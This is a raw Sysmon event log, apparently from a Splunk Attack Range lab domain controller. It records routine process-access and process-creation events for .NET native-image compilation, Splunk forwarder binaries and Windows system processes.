13:20:16.173{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4510-6000-4601-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.032{08A6967A-450F-6000-4401-000000009A01}30562908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.954{08A6967A-4511-6000-4C01-000000009A01}27364752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4511-6000-4C01-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4511-6000-4C01-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.798{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4511-6000-4C01-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.799{08A6967A-4511-6000-4C01-000000009A01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.267{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4511-6000-4B01-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.267{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4511-6000-4B01-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.267{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4511-6000-4B01-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.189{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4511-6000-4A01-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.189{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4511-6000-4A01-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:17.189{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4511-6000-4A01-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:17.126{08A6967A-4510-6000-4901-000000009A01}4564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11d4-0\System.ServiceProcess.dll2021-01-14 13:20:17.126 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.626{08A6967A-4512-6000-5001-000000009A01}47164288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.611{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4512-6000-5101-000000009A01}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.611{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4512-6000-5101-000000009A01}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.611{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4512-6000-5101-000000009A01}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:18.470{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4512-6000-5001-000000009A01}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 